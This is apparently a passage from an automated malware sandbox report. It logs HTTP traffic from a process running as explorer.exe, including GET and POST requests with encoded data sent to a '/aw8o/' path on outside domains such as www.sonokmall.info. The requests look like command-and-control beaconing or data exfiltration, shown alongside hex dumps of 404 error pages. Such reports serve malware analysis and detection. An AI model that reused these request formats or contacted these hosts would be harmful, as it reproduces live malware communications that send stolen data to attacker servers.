                                                                                                                                                                                          Aug 10, 2023 10:19:04.197329998 CEST314INData Raw: 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20
                                                                                                                                                                                          Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
                                                                                                                                                                                          Aug 10, 2023 10:19:04.197354078 CEST315OUTData Raw: 6e 71 55 4c 4c 45 79 75 64 7a 51 70 70 54 58 52 53 5a 77 70 68 30 56 2f 4a 50 2f 6e 7a 7a 79 4f 53 76 50 54 46 6b 37 68 6c 76 42 4a 31 4a 76 77 36 62 72 53 49 41 75 5a 78 32 58 4f 69 68 74 52 45 65 73 78 6c 6e 55 75 71 33 4f 77 34 43 36 63 4a 72
                                                                                                                                                                                          Data Ascii: nqULLEyudzQppTXRSZwph0V/JP/nzzyOSvPTFk7hlvBJ1Jvw6brSIAuZx2XOihtREesxlnUuq3Ow4C6cJrMXWzVwMOXJHz6Y1lX7GvuP5WWj4UbgCRVCxaJAJzFwowpev9g/6Sl5LpO2D3kiNS+W5dJwtVLrEPvOw3h9nMksincleOk1O0yzYpBMvsFvBXHUZ+5TCfSo97ffUz+n4Eqx9VjC6hTsRksI0NLgSNWcujE+VUeV+ZV
                                                                                                                                                                                          Aug 10, 2023 10:19:04.197521925 CEST316OUTData Raw: 4d 32 6b 45 4a 33 47 66 74 44 39 76 58 41 7a 48 34 68 75 78 63 32 6f 63 52 49 6b 34 67 44 71 30 38 74 51 4b 75 59 74 69 69 66 63 70 58 54 58 54 59 53 44 37 68 36 4b 34 6c 54 5a 6b 56 37 78 37 44 67 76 33 2f 57 58 4f 6f 57 52 41 54 49 6f 57 77 69
                                                                                                                                                                                          Data Ascii: M2kEJ3GftD9vXAzH4huxc2ocRIk4gDq08tQKuYtiifcpXTXTYSD7h6K4lTZkV7x7Dgv3/WXOoWRATIoWwitzpW0By5JAXCqu8R3ERI00AW1ER4g8nE71ozmj+EiBWICxfC8RiYpWgxhLU4b2K2RiNaYBVSUNtWuRFBOEMLBzr/0bwxEiMb2GkeE+9XANKTUzIEkVyeNYXYGTQMeNKpDzY2q9g7UmxnCp+JKFCh8Q5hAsi1ThSne


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          6192.168.11.204972196.44.182.13180C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:19:06.719094992 CEST317OUTGET /aw8o/?1NM6e=9zOZF6sYY9k/tdVrbXWkN8sA2agMahsOyqxI7TXZC8QU+v+BgRTEySnaHWgeO9Bnd0OQd62k8t+QBgqfLMlzOLISTcCK1ibTiw==&P4=_n5TPHiTKZj HTTP/1.1
                                                                                                                                                                                          Host: www.handsome-sex.com
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Aug 10, 2023 10:19:06.879416943 CEST319INHTTP/1.1 404 Not Found
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                          content-type: text/html
                                                                                                                                                                                          content-length: 1238
                                                                                                                                                                                          date: Thu, 10 Aug 2023 08:19:08 GMT
                                                                                                                                                                                          server: LiteSpeed
                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74
                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
                                                                                                                                                                                          Aug 10, 2023 10:19:06.879503012 CEST319INData Raw: 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20
                                                                                                                                                                                          Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          7192.168.11.2049722162.0.239.14580C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:19:12.087296963 CEST320OUTPOST /aw8o/ HTTP/1.1
                                                                                                                                                                                          Host: www.sonokmall.info
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Origin: http://www.sonokmall.info
                                                                                                                                                                                          Referer: http://www.sonokmall.info/aw8o/
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 186
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Data Raw: 31 4e 4d 36 65 3d 31 79 61 53 47 76 59 53 31 73 55 49 55 58 31 78 43 39 4a 41 34 32 6d 59 31 68 68 67 77 4b 70 6e 4b 69 7a 31 65 71 66 51 48 44 6a 44 76 6c 33 4c 68 41 4a 61 47 55 68 73 37 61 76 6b 48 78 6c 79 63 2b 2f 53 59 32 71 55 50 46 63 76 31 63 39 5a 78 59 68 4b 59 63 69 39 58 48 57 53 6d 61 39 33 45 54 39 38 56 34 78 7a 6c 56 76 71 64 34 36 73 77 53 45 43 54 4e 59 49 73 6f 71 6a 6f 4c 71 6a 2b 6d 36 38 49 76 58 7a 31 65 2f 47 76 54 45 31 44 62 36 65 42 49 76 79 73 75 48 56 51 64 54 53 70 77 37 4b 2b 47 41 62 69 79 74 44 4f 73 37 67 33 51 3d 3d
                                                                                                                                                                                          Data Ascii: 1NM6e=1yaSGvYS1sUIUX1xC9JA42mY1hhgwKpnKiz1eqfQHDjDvl3LhAJaGUhs7avkHxlyc+/SY2qUPFcv1c9ZxYhKYci9XHWSma93ET98V4xzlVvqd46swSECTNYIsoqjoLqj+m68IvXz1e/GvTE1Db6eBIvysuHVQdTSpw7K+GAbiytDOs7g3Q==
                                                                                                                                                                                          Aug 10, 2023 10:19:12.357135057 CEST322INHTTP/1.1 404 Not Found
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:19:12 GMT
                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                          Content-Length: 38381
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34 36 2e 31 20 32 38 38 2e 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 34 35 2e 38 22 20 63 79 3d 22 38 36 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34 36 2e 35 20 32 39 38 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d
                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="445.8" cy="867.7" r="3.7" transform="translate(-346.5 298.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx=
                                                                                                                                                                                          Aug 10, 2023 10:19:12.357212067 CEST323INData Raw: 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34 30 2e 31 20 32 39 33 2e 34 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65
                                                                                                                                                                                          Data Ascii: "438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.6 299.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="
                                                                                                                                                                                          Aug 10, 2023 10:19:12.357274055 CEST324INData Raw: 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 38 37 2e 39 22 20 63 79 3d 22 38 31 30 2e 32 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65
                                                                                                                                                                                          Data Ascii: ll: #ffe029"/> <circle cx="487.9" cy="810.2" r="3.7" transform="translate(-315.6 311.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="489.8" cy="791.1" r="3.7" transform="translate(-306.7 310.1) rotate(-27.1)" style="fil
                                                                                                                                                                                          Aug 10, 2023 10:19:12.357331991 CEST325INData Raw: 32 20 33 31 38 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 31 39 2e 37 22 20 63 79 3d 22 38 31
                                                                                                                                                                                          Data Ascii: 2 318.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="519.7" cy="812.9" r="3.7" transform="translate(-313.4 326.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="534.7" cy="822.9" r="3.7" transform="translate(-316.3
                                                                                                                                                                                          Aug 10, 2023 10:19:12.357405901 CEST327INData Raw: 37 39 30 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 39 37 2e 33 20 33 34 37 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65
                                                                                                                                                                                          Data Ascii: 790.5" r="3.7" transform="translate(-297.3 347.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="589.7" cy="797.2" r="3.7" transform="translate(-298.5 356.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="590" cy="782
                                                                                                                                                                                          Aug 10, 2023 10:19:12.357486010 CEST328INData Raw: 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 34 38 22 20 63 79 3d 22 37 34 37 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 36 39 2e 34 20 33 37 37 2e 35 29 20 72
                                                                                                                                                                                          Data Ascii: <circle cx="648" cy="747.5" r="3.7" transform="translate(-269.4 377.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="643.5" cy="727.1" r="3.7" transform="translate(-260.6 373.2) rotate(-27.1)" style="fill: #ffe029"/>
                                                                                                                                                                                          Aug 10, 2023 10:19:12.357578039 CEST330INData Raw: 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 39 34 2e 37 22 20 63 79 3d 22 37 36 37 2e 39 22 20 72
                                                                                                                                                                                          Data Ascii: 1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="594.7" cy="767.9" r="3.7" transform="translate(-284.6 355.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.7" cy="773.4" r="3.7" transform="translate(-289.3 346.9
                                                                                                                                                                                          Aug 10, 2023 10:19:12.357644081 CEST331INData Raw: 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 34 37 2e 33 20 33 33 36 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09
                                                                                                                                                                                          Data Ascii: ="3.7" transform="translate(-247.3 336.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="559.1" cy="669.7" r="3.7" transform="translate(-243.8 328.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="558.2" cy="686.9" r=
                                                                                                                                                                                          Aug 10, 2023 10:19:12.357712984 CEST332INData Raw: 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 35 36 2e 33 22 20 63 79 3d 22 37 30 33 2e 39 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 39 2e 37 20 33 33 30 2e 39 29
                                                                                                                                                                                          Data Ascii: <circle cx="556.3" cy="703.9" r="3.7" transform="translate(-259.7 330.9) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="552.7" cy="720.2" r="3.7" transform="translate(-267.5 331.1) rotate(-27.1)" style="fill: #ffe029"/>
                                                                                                                                                                                          Aug 10, 2023 10:19:12.357913017 CEST334INData Raw: 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 30 31 22 20 63 79 3d 22 37 31 37 2e 32 22 20 72 3d 22 33 2e 37 22 20 74 72 61
                                                                                                                                                                                          Data Ascii: e(-27.1)" style="fill: #ffe029"/> <circle cx="501" cy="717.2" r="3.7" transform="translate(-271.8 307.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="487.1" cy="704.7" r="3.7" transform="translate(-267.6 299.4) rotate(-
                                                                                                                                                                                          Aug 10, 2023 10:19:12.526662111 CEST335INData Raw: 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 34 30 2e 32 20 32 39 36 2e 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c
                                                                                                                                                                                          Data Ascii: rm="translate(-240.2 296.3) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="478.7" cy="654.5" r="3.7" transform="translate(-245.7 290.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="477.7" cy="634.1" r="3.7" transfor


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          8192.168.11.2049723162.0.239.14580C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:19:14.774473906 CEST362OUTPOST /aw8o/ HTTP/1.1
                                                                                                                                                                                          Host: www.sonokmall.info
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Origin: http://www.sonokmall.info
                                                                                                                                                                                          Referer: http://www.sonokmall.info/aw8o/
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 526
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Data Raw: 31 4e 4d 36 65 3d 31 79 61 53 47 76 59 53 31 73 55 49 58 33 46 78 41 61 6c 41 35 57 6d 62 36 42 68 67 2b 71 6f 67 4b 69 50 31 65 72 71 4e 48 56 7a 44 75 41 4c 4c 67 46 31 61 42 55 68 73 70 36 76 68 4a 52 6c 6c 63 2b 7a 72 59 32 6d 55 50 46 59 76 30 75 46 5a 7a 6f 68 56 4d 4d 69 2b 51 48 57 70 74 36 39 48 45 54 78 47 56 35 31 7a 6c 6b 44 71 63 2b 75 73 6e 77 38 42 45 39 59 53 39 49 71 6b 69 72 71 68 2b 68 7a 42 49 75 66 4a 31 70 44 47 76 79 6b 31 43 62 36 5a 4a 34 76 31 6c 4f 47 66 63 66 4f 5a 76 77 62 53 6b 54 59 6e 36 6a 56 52 4c 6f 75 51 6c 42 35 77 52 44 6f 6c 50 4a 66 5a 64 37 49 69 72 41 78 6a 7a 74 77 30 74 54 7a 53 64 67 51 34 4d 46 6b 47 53 57 79 4e 53 43 63 49 6b 48 67 33 30 44 67 50 52 43 31 57 6b 2f 2f 53 45 36 34 4f 4f 6d 50 53 52 65 6b 47 69 65 48 51 6e 79 73 6d 70 6d 45 52 68 78 69 35 76 38 67 39 5a 42 64 6b 59 7a 61 70 55 4b 67 7a 44 65 52 78 36 45 37 6d 4e 2b 37 75 2b 2b 74 72 73 38 7a 61 58 59 54 4c 55 33 64 4b 4a 44 58 51 55 36 58 48 44 4d 43 45 36 5a 6b 58 56 6f 38 2f 51 6c 44 74 73 52 39 58 41 48 42 64 43 47 33 39 47 32 6d 46 56 6e 38 50 47 50 35 74 76 5a 66 30 54 79 54 51 2b 69 6a 4b 76 34 55 33 47 70 57 54 5a 53 6a 44 46 33 4f 56 31 52 37 36 43 55 47 35 5a 53 2f 49 4c 49 64 37 79 54 68 4d 55 79 43 2b 71 2f 4e 6e 39 67 69 69 63 32 6c 79 4e 4f 4f 6a 6b 58 78 46 71 6f 31 37 55 2f 65 6b 52 